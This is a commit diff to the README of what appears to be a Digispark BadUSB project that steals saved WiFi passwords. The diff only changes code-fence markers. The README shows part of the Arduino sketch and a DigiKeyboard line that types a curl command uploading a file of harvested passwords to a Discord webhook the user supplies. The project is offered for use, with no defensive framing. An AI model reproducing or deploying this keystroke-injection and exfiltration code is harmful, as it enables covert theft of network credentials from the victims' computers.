Update README.md
This commit is contained in:
parent
2489b09f9d
commit
8b2005f612
|
@ -20,12 +20,12 @@
|
|||
change the "FILENAME" to anyname you want your folder to be.
|
||||
|
||||
Also Edit the line number 16 in the Arduino code and insert the following details (* most important Webhook url)
|
||||
'''
|
||||
|
||||
DigiKeyboard.println("curl -i -H \"Expect:application/json\" -F file=@wifi -F \"payload_json={\\\"wait\\\":true,\\\"content\\\":\\\"ANYCOMMENT\\\",\\\"ANYNAME\\\":\\\"passwords\\\"}\" WEBHOOK_URL"); //curl command which is used to send the passwords to your discord channel/server (**Change replace "WEBHOOK_URL" with your discord's webhook url of any channel.
|
||||
'''
|
||||
|
||||
|
||||
#### Example:
|
||||
'''
|
||||
|
||||
#include "DigiKeyboard.h"
|
||||
void setup() {
|
||||
pinMode(1, OUTPUT); //LED on Model A
|
||||
|
@ -47,7 +47,6 @@
|
|||
digitalWrite(1, HIGH); //led on
|
||||
DigiKeyboard.delay(90000);
|
||||
}
|
||||
'''
|
||||
|
||||
### Your are all set to upload the code.
|
||||
|
||||
|
|
Loading…
Reference in New Issue